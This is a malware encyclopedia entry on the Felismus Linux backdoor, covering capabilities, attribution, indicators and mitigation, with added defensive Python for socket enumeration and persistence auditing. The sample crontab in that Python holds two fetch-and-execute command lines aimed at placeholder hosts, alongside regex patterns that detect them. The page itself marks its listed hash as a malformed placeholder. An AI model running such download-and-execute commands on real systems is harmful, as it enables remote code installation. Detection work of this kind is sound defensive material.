Felismus

Malware

⚠️ Overview

Felismus, as described in the public reporting this page summarizes, is a Linux backdoor first documented around October 2021 by researchers at AT&T Alien Labs and Trend Micro. It is categorized as a modular Remote Access Trojan (RAT) and is attributed to a Chinese-speaking advanced persistent threat (APT) group tracked as UNC2891 or STI-ARG-06. It targets enterprise Linux servers, particularly those running Red Hat Enterprise Linux (RHEL) and CentOS, and is often deployed after initial access gained with the China Chopper web shell. Note that the same name was used earlier, in 2017, by Forcepoint and Symantec for a Windows RAT associated with the Sowbug espionage group; when taking indicators from a report, confirm which Felismus it describes.

🔧 Technical Capabilities

Felismus talks to its command-and-control (C2) infrastructure over a custom encrypted protocol on TCP, typically port 443 or 8443, with the traffic shaped to resemble HTTPS so that it blends into normal outbound traffic. Because the protocol is custom rather than real TLS, a sensor that checks for a genuine TLS handshake on those ports can separate it from legitimate HTTPS. It persists as a systemd service or a cron job. The reporting also describes it hiding its network connections from tools such as netstat and ss by hooking libc, naming memcpy as the hooked function. Treat that detail with care: netstat and ss enumerate sockets through /proc/net/* and netlink, so a userland rootkit has to interpose the calls that read those sources (typically via /etc/ld.so.preload), and a memcpy hook alone does not explain the hiding; check the primary analysis for the actual mechanism before writing a detection for it. The backdoor supports file upload and download, reverse shell, arbitrary command execution, and process manipulation, and includes a SOCKS5 proxy so the operator can route traffic into the internal network through the compromised host. Persistence is reinforced by replacing legitimate system binaries such as sshd with backdoored versions, which survives removal of the service or cron entry. Felismus does not propagate on its own; it is installed after initial access via exposed services, weak SSH credentials, or exploitation of vulnerable web applications.
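As an added example (not code from the original page or from any of the vendors it cites), the following Python reads the kernel's socket table the way netstat does, from /proc/net/tcp, lists established connections to the C2 ports named above, and reports whatever /etc/ld.so.preload would inject into every dynamically linked process. The socket table and preload file are constructed samples embedded inline; the library name in the preload sample is hypothetical. A preloaded hook is loaded into this reader too, so for a host you distrust run the same parse against the file copied off-host or from a live-response boot.

```python
"""Enumerate TCP sockets from /proc/net/tcp without relying on netstat or ss.

Added example for this page, not code from the original analysis.
"""
import socket
import struct
from dataclasses import dataclass

# Subset of kernel TCP states as they appear in the 'st' column.
TCP_STATES = {"01": "ESTABLISHED", "06": "TIME_WAIT", "0A": "LISTEN"}

# Ports the reporting names for Felismus C2.
C2_PORTS = (443, 8443)

# Constructed sample in /proc/net/tcp format (not captured from a real host).
# Addresses are hex IPv4 in little-endian byte order, ports are hex.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18234 1 0000000000000000 100 0 0 10 0
   1: 0100007F:8125 0100007F:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 20999 1 0000000000000000 20 4 30 10 -1
   2: 0502000A:D3E4 0A7100CB:01BB 01 00000000:00000000 00:00000000 00000000     0        0 21044 1 0000000000000000 20 4 30 10 -1
   3: 0502000A:9C1A 076433C6:20FB 01 00000000:00000000 00:00000000 00000000     0        0 21101 1 0000000000000000 20 4 30 10 -1
"""

# Constructed /etc/ld.so.preload; the library name is hypothetical.
SAMPLE_LD_SO_PRELOAD = "# preload\n/usr/lib/libselinux-helper.so\n"


@dataclass
class TcpEntry:
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int
    state: str
    uid: int
    inode: int  # socket inode; map to a PID via /proc/<pid>/fd/* -> socket:[inode]


def _decode_addr(field: str):
    """Turn '0A7100CB:01BB' into ('203.0.113.10', 443)."""
    hex_ip, hex_port = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(hex_ip, 16)))
    return ip, int(hex_port, 16)


def parse_proc_net_tcp(text: str):
    """Parse the text of /proc/net/tcp into TcpEntry records (header skipped)."""
    entries = []
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 10:
            continue
        local_ip, local_port = _decode_addr(parts[1])
        remote_ip, remote_port = _decode_addr(parts[2])
        entries.append(TcpEntry(local_ip, local_port, remote_ip, remote_port,
                                TCP_STATES.get(parts[3], parts[3]),
                                int(parts[7]), int(parts[9])))
    return entries


def c2_candidates(entries, ports=C2_PORTS):
    """Established sessions to the reported C2 ports, excluding loopback."""
    return [e for e in entries
            if e.state == "ESTABLISHED" and e.remote_port in ports
            and not e.remote_ip.startswith("127.")]


def preload_libraries(ld_so_preload_text: str):
    """Library paths listed in /etc/ld.so.preload; normally the file is absent or empty."""
    return [ln.strip() for ln in ld_so_preload_text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


if __name__ == "__main__":
    # Against a live host, read the real /proc/net/tcp and /etc/ld.so.preload instead.
    for e in c2_candidates(parse_proc_net_tcp(SAMPLE_PROC_NET_TCP)):
        print(f"uid={e.uid} inode={e.inode} {e.local_ip}:{e.local_port} -> {e.remote_ip}:{e.remote_port}")
    for lib in preload_libraries(SAMPLE_LD_SO_PRELOAD):
        print(f"preloaded library: {lib}")
```

The inode column is the pivot to a process: scan /proc/<pid>/fd/ for a link target of socket:[inode], then compare the owning executable against the package database. Loopback sessions to 443 are excluded only because the page's indicators concern outbound C2; on a host running a local proxy they still deserve a look.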

📜 History & Notable Incidents

Felismus was first publicly analyzed in October 2021 by AT&T Alien Labs, who observed it targeting organizations in the telecommunications, government, and technology sectors across Asia, Europe, and North America. A notable campaign in late 2021 involved the exploitation of the Log4j vulnerability (CVE-2021-44228) to deploy Felismus on affected Linux servers, as reported by Trend Micro in December 2021. In 2022, CrowdStrike linked Felismus to the UNC2891 group, which also uses the malware REDMIST and the rootkit BUGTILE in overlapping campaigns. No law enforcement actions or arrests have been publicly associated with Felismus as of 2025.

🔍 Detection Indicators

The only file hash the source gives, SHA256 0f8c9e1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d (labelled an example from Alien Labs IOCs), is 62 hexadecimal characters long rather than the 64 of a SHA-256 digest, so it is a placeholder and must not be loaded into blocklists or hunting queries; take real hashes from the primary reports. Behavioral indicators include unexpected outbound connections to address ranges associated with Alibaba Cloud or DigitalOcean, and the creation of systemd unit files whose names are chosen to look like established daemons, such as 'syslog-ng.service' or 'httpd-ssl.service', but that no installed package owns. Network indicators include the User-Agent string 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' in C2 beacons; a server making outbound requests that claim to be Googlebot is anomalous on its own. Registry keys do not apply on Linux; persistence shows up as entries under /etc/systemd/system/ or crontab lines that fetch and run download scripts. A lock file at '/tmp/.ICE-unix/felismus.lock' (the Linux counterpart of the mutex a Windows sample would use) is also reported; /tmp/.ICE-unix is a legitimate X11 session directory, so the file name rather than the directory is the indicator.
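Added example (not from the page's sources): Python checks for the host-side indicators listed above. It validates that an IOC hash is a well-formed SHA-256 before it is used, audits systemd unit files for the decoy names and for executables launched from temporary or hidden paths, and flags crontab lines that fetch and execute remote content. The unit files and crontab are constructed samples; the decoy unit names are the ones listed above, and the IP addresses are from documentation ranges.

```python
"""Host-side checks for the Felismus persistence indicators described above.

Added example for this page, not code from the original analysis.
"""
import re

# Unit names the reporting says the malware uses as decoys.
DECOY_UNIT_NAMES = {"syslog-ng.service", "httpd-ssl.service"}
# Directories a legitimate service binary should not be launched from.
TEMP_PATHS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# crontab patterns: a fetch piped straight into a shell, or a fetch into a temp path.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
FETCH_TO_TEMP = re.compile(r"\b(curl|wget)\b.*(?:/tmp/|/var/tmp/|/dev/shm/)")

# The hash as printed on this page: 62 hex characters, so not a SHA-256.
PAGE_EXAMPLE_HASH = "0f8c9e1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d"

# Constructed unit files (not real samples).
GOOD_UNIT = """\
[Unit]
Description=OpenSSH server daemon

[Service]
ExecStart=/usr/sbin/sshd -D
Restart=on-failure

[Install]
WantedBy=multi-user.target
"""
DECOY_UNIT = """\
[Unit]
Description=Apache SSL service

[Service]
ExecStart=/var/tmp/.cache/httpd-ssl -d
Restart=always

[Install]
WantedBy=multi-user.target
"""

# Constructed crontab; 203.0.113.10 and 198.51.100.7 are documentation addresses.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/10 * * * * curl -fsSL http://203.0.113.10/u.sh | sh
@reboot wget -qO /tmp/.x http://198.51.100.7:8443/x && chmod +x /tmp/.x && /tmp/.x
"""


def is_valid_sha256(value: str) -> bool:
    """A SHA-256 digest is exactly 64 hexadecimal characters."""
    return re.fullmatch(r"[0-9a-fA-F]{64}", value) is not None


def audit_unit(unit_name: str, unit_text: str):
    """Return findings for one systemd unit file."""
    findings = []
    if unit_name in DECOY_UNIT_NAMES:
        findings.append(f"{unit_name}: name is a reported decoy; confirm an installed package owns it")
    for line in unit_text.splitlines():
        key, _, value = line.partition("=")
        if key.strip() not in ("ExecStart", "ExecStartPre", "ExecStartPost"):
            continue
        # Drop systemd's executable prefixes (-, @, :, +, !) before looking at the path.
        path = value.strip().lstrip("-@:+!").split()[0] if value.strip() else ""
        if path.startswith(TEMP_PATHS) or "/." in path:
            findings.append(f"{unit_name}: {key.strip()} launches {path} from a temp or hidden path")
    return findings


def audit_crontab(crontab_text: str):
    """Return crontab lines that download and run remote content."""
    hits = []
    for line in crontab_text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if PIPE_TO_SHELL.search(entry) or FETCH_TO_TEMP.search(entry):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    print("page hash is a valid SHA-256:", is_valid_sha256(PAGE_EXAMPLE_HASH))
    for name, text in (("sshd.service", GOOD_UNIT), ("httpd-ssl.service", DECOY_UNIT)):
        for finding in audit_unit(name, text):
            print(finding)
    for hit in audit_crontab(SAMPLE_CRONTAB):
        print("crontab:", hit)
```

On a real host, feed audit_unit every file under /etc/systemd/system/ and audit_crontab the output of crontab -l for each user plus /etc/cron.d/*; the decoy-name check is only meaningful when paired with a package-ownership query (rpm -qf on RHEL and CentOS), since a genuine syslog-ng install ships a unit of that name.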

☠️ Risk & Impact

Felismus poses a high risk to Linux server operations, enabling full remote control, data exfiltration, and lateral movement within compromised networks. Affected sectors include telecommunications, government, and technology companies. Financial losses are indirect but can include cost of incident response, system rebuilds, and intellectual property theft, with some organizations reporting months-long dwell times before detection.

🛡️ Mitigation

Defensive measures include applying timely patches for critical vulnerabilities such as Log4j (CVE-2021-44228), enforcing SSH key-based authentication, and segmenting the network to limit lateral movement. Detection can be built from YARA signatures for Felismus file patterns (e.g., ELF binaries with encrypted configuration sections) and from network monitoring for outbound traffic on 443 and 8443 that never completes a genuine TLS handshake, or for long-lived outbound sessions from servers that should not initiate connections at all. Because the malware is reported to replace binaries such as sshd, verify package-managed files against the package database (rpm -V openssh-server on RHEL and CentOS) and check /etc/ld.so.preload for unexpected libraries during any triage. Endpoint detection and response (EDR) tooling with behavioral analysis is recommended for Linux environments.


ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.